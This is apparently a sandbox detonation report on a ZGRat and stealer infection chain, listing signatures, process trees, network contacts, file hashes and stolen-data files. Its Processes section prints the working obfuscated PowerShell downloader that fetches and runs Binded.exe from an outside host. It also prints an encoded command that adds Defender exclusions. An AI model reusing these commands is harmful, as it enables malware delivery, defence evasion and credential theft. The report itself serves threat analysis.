memory/2148-1236-0x0000000006E70000-0x0000000006E7A000-memory.dmp

memory/2148-1237-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/2148-1238-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1239-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1240-0x0000000005170000-0x0000000005180000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Binded.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\rock.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\rock.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3756 set thread context of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3200 set thread context of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\blbrok.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rock.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3844 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Binded.exe
PID 3844 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Binded.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 456 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\rock.exe
PID 2908 wrote to memory of 456 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\rock.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ckCYMarg($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs){[IO.File]::WriteAllBytes($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs)};function WypStgKENDEIcA($ZMHRISzDhdwdY){if($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58153,58161,58161))) -eq $True){rundll32.exe $ZMHRISzDhdwdY }elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58165,58168,58102))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZMHRISzDhdwdY}elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58162,58168,58158))) -eq $True){misexec /qn /i $ZMHRISzDhdwdY}else{Start-Process $ZMHRISzDhdwdY}};function TXuAgVFpQG($hindkrPqZcNyrlU){$RgafzCFGvzVmJX = New-Object (FPFknBqQsu @(58131,58154,58169,58099,58140,58154,58151,58120,58161,58158,58154,58163,58169));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aumfRHUmZgmLSBs = $RgafzCFGvzVmJX.DownloadData($hindkrPqZcNyrlU);return $aumfRHUmZgmLSBs};function FPFknBqQsu($rxPrWTWbbzv){$lzrQhUf=58053;$IgPoeJQDbcreOFG=$Null;foreach($SheyHVSxpFbk in $rxPrWTWbbzv){$IgPoeJQDbcreOFG+=[char]($SheyHVSxpFbk-$lzrQhUf)};return $IgPoeJQDbcreOFG};function OCOpOfqedID(){$SFaTrukxkqfhJljN = $env:AppData + '\';$AHqkDmXF = $SFaTrukxkqfhJljN + 'Binded.exe'; if (Test-Path -Path $AHqkDmXF){WypStgKENDEIcA $AHqkDmXF;}Else{ $jiPMwkwJERZcU = TXuAgVFpQG (FPFknBqQsu @(58157,58169,58169,58165,58168,58111,58100,58100,58162,58150,58156,58158,58152,58099,58165,58164,58158,58168,58164,58163,58169,58164,58164,58161,58175,58099,58152,58164,58162,58100,58119,58158,58163,58153,58154,58153,58099,58154,58173,58154));ckCYMarg $AHqkDmXF $jiPMwkwJERZcU;WypStgKENDEIcA $AHqkDmXF;};;;;}OCOpOfqedID;

C:\Users\Admin\AppData\Roaming\Binded.exe

"C:\Users\Admin\AppData\Roaming\Binded.exe"

C:\Users\Admin\AppData\Local\Temp\rock.exe

"C:\Users\Admin\AppData\Local\Temp\rock.exe"

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 138.91.171.81:80 tcp
NL 52.142.223.178:80 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.140.118.28:443 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.140.118.28:443 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.3.187.198:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.77.160.23:80 tcp
US 8.8.8.8:53 udp
N/A 194.33.191.53:58001 tcp
US 8.8.8.8:53 udp
GB 96.17.179.12:80 tcp
N/A 194.33.191.53:58001 tcp

Files

memory/3844-3-0x00000000048C0000-0x00000000048D0000-memory.dmp

memory/3844-4-0x0000000004F00000-0x0000000005528000-memory.dmp

memory/3844-2-0x00000000048C0000-0x00000000048D0000-memory.dmp

memory/3844-5-0x0000000004CE0000-0x0000000004D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwysozym.tol.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3844-16-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/3844-6-0x00000000055D0000-0x0000000005636000-memory.dmp

memory/3844-1-0x0000000071ED0000-0x0000000072680000-memory.dmp

memory/3844-0-0x0000000004700000-0x0000000004736000-memory.dmp

memory/3844-17-0x00000000057E0000-0x0000000005B34000-memory.dmp

memory/3844-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp

memory/3844-18-0x0000000005C80000-0x0000000005C9E000-memory.dmp

memory/3844-22-0x0000000006230000-0x0000000006252000-memory.dmp

memory/3844-23-0x00000000072B0000-0x0000000007854000-memory.dmp

memory/3844-21-0x00000000061C0000-0x00000000061DA000-memory.dmp

memory/3844-20-0x0000000006C60000-0x0000000006CF6000-memory.dmp

memory/3844-24-0x0000000007EE0000-0x000000000855A000-memory.dmp

memory/2908-39-0x0000000000D80000-0x00000000012F2000-memory.dmp

memory/2908-40-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/2908-41-0x000000001BFE0000-0x000000001BFF0000-memory.dmp

memory/3844-38-0x0000000071ED0000-0x0000000072680000-memory.dmp

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 e447ce4e0dd50659d1ed5328ae95c742
SHA1 279e5fe69fdd32158117c272c0ac206b4a393896
SHA256 3b6bf86b11ea507fbb214c9ed26210d25f48656b03a7d56134ce63e49c388e41
SHA512 7064301eac7ab2e2d2a9cd2d12c0ab236585de5f2d7476b51e00180f7f7de65736a4abfbfbec568768963deea1753b3011a09d50e5a24e3c00a36f840241b86d

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 8bf787cd1198e3127190462262c66af7
SHA1 c3bd6e1278ef871d0804512f3dc27ab8673027f9
SHA256 efeb073272216decf23b6885215f4cb16a68c631c0054ba411fc32757f1df130
SHA512 7f0cf90bd61456f331f078eaf20e91940ab2146aa5905b64ee06dc91bcb07a7da74c864996421942b4f0dd51055f805cc9add964a2136a1b8f2fec6dee982266

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 09379b3c4a2c8d7e740d9418deea490a
SHA1 305cdfded9fb5a12904fb2712d2f2a989f6814a2
SHA256 7833cadca8b516636500eaac8479e6644c06af9dbbd5cd613a2276ba34ac03a1
SHA512 116d6d6127b0d32a10ec5ea09d37c627c188727ea3e1df609c8a31e3c332fc56b877d7492ce001c58821c25ccb3d9dd62fbf8cd67e28fb1b27810fbbb29a63ab

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 03bfe4f50a77d2467b47614d34c42fb6
SHA1 4e3ab73980dc220bdc9c207788f199b572d488b5
SHA256 2072b19de24e8246be2422ba3122cfef2e11e4bcc3ef46bfce22b886f6e168f3
SHA512 338fb3ddd309b81bad5af5dbc7f2c60080124736a10d5dee76dba36c2730f20842f69a7e347b82a3285e7b4b937c1688a5064061f5cc02fcb03c2180112a524e

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 2af26422ada303194e29a808560b21bf
SHA1 eefb4a2823d85c20862754950027bf316e898310
SHA256 46c6fa4a583cf1a287fc09f9bf57bc8e91d817559de7f5c9ce5194a1d32bcc9e
SHA512 1bbdf1d604ba208f000906722045dd0e3c5aa1655c22e0979d9d4eba41e4bb1c21fcbcef1aeba49f8f9109764d71b2dde2813672fddda2c85784d3bcfdbf435d

memory/3972-72-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/3972-81-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-87-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-95-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-99-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-101-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-103-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-104-0x000001C442E70000-0x000001C442E80000-memory.dmp

memory/3972-108-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-106-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-113-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-115-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-111-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-97-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-93-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-91-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-89-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-85-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-121-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-131-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-143-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-141-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-139-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-137-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-135-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-133-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-129-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-127-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-125-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-123-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-119-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-117-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-83-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-288-0x000001C442E80000-0x000001C442ED0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

memory/3972-79-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-78-0x000001C4285A0000-0x000001C428718000-memory.dmp

memory/2908-77-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/456-76-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/3972-75-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-73-0x0000000004BE0000-0x0000000004CC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 55c1e65b9e7ac557b4c076d1b06e975a
SHA1 66bff0bd3d9a0acd309d2cc345ef20cf0983ce24
SHA256 0c5834d8e470877274399911bf41aca8dfe1b78c56b2eef989ae6dda2eb99ddb
SHA512 1842ef859e86f99b8fc7cf41b7f79d39ef33d9dccb630c1a6b9ddf1723d35905b73a8ae2971554bdd9ccf3a8517f32c08209e45bca842ca519312276c274c7ba

memory/3972-67-0x0000000000350000-0x00000000003EC000-memory.dmp

memory/3972-69-0x0000000074E00000-0x00000000755B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 f9b52117a18922a656813c19c900e1a0
SHA1 5799c4228d6567a1335e338f15c4912eeef0a2a2
SHA256 7b60894783f90113c994ca42f60ec47db34e7e99aa01de2e2f7e03b840db304a
SHA512 e7377913c9215fdd2b1be050f225defcd3182b4b9a5a0d4ff2ddb1e6ecc84ee20dfea58fca514819a0206deec8f3ea1ef64c2598b68869f0218ab9cae0c4f921

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 f189e88b77130e0dbef360901a49b75f
SHA1 4889b7a7907d01653e9030e282d00ad637249061
SHA256 326ad5539723ddc92995ae4f22ad0d99f8202c7d759d7c65e8204f2303fedd94
SHA512 db3138ed6f472f52e7e52fce37b4808b27eaa83d5f4d3fbc1bdc8149d2ded7c9a1e3e6bf9bb00fe60a654884d54da0cadfb6fe18cabb972316fb31bd35930f8a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f0703cbb7d230784f16f051935e13267
SHA1 ea7120074ca0bd261431e4de812eb853748bf3fb
SHA256 d1eb588b0f67f2f65a69dd3152f9351db6746be59c83d55f104bf31b8f8abf42
SHA512 6002a89265a2b33c1c1e51859e2df65a6d207a235c4e17c039362b7d95cafc217a151d5386be42caafe71b24150687001db464f28cdbeaab28dec2468865ce6c

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

MD5 0e103855aba5d5d4e78d92694c113cec
SHA1 f77845a6b5793f276c904de52b03634bfbeea6ae
SHA256 5713320a6d17f3c597e2dda9ace84f51faa3570323f1ba02a30baa62f07013c0
SHA512 9521451b24d5654dd2f11257530bfc116645b7e123a5f55f20f7123707a5e05603f919989a9ddd2f73abe91d22fed434080b509bab15cebdb495006bee476eef

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

MD5 00e55127fe6b8edb0071c2a557fab93c
SHA1 0f9017dcbf0939a341bf4a5f4040fa02dc4affb4
SHA256 c6631aee4cc4e511bd16289e1abf3cef7668d63d5e0467acf7e22dafcf18caa2
SHA512 81e53ae890f520e247ba477bc173e669cef49d9c73ccd2d16695120aee8face53d4f4b3adb79950a7b3bfcd59ebfe1830db33e47e00322ee7d3f800fcab7666b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

MD5 f3ed43acd7d035e8c6035c7d65ec60bf
SHA1 679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512 fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

MD5 1a9ac8aa754a986cccb6580f1494b813
SHA1 3f99084894df1307c1cc22228d22e075d461344e
SHA256 c4c16b46ca26315f46e2fc97dd93646064c9c06098c0aecc1cf3851b4eb4d1b2
SHA512 4fdc5869fa38faf95200a70eb069b1ed6987c3085fbad4940b877eebc4b6a723c492ead79938d00843e86f4fc9c40a64c7d4ccd3ea64b7128b763c9300319b8f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wqjqot.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt

MD5 824ce7c07117a630e9b31638f89476aa
SHA1 2d012f1cd8b636de1662f69d213b3cf9fa5df846
SHA256 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd
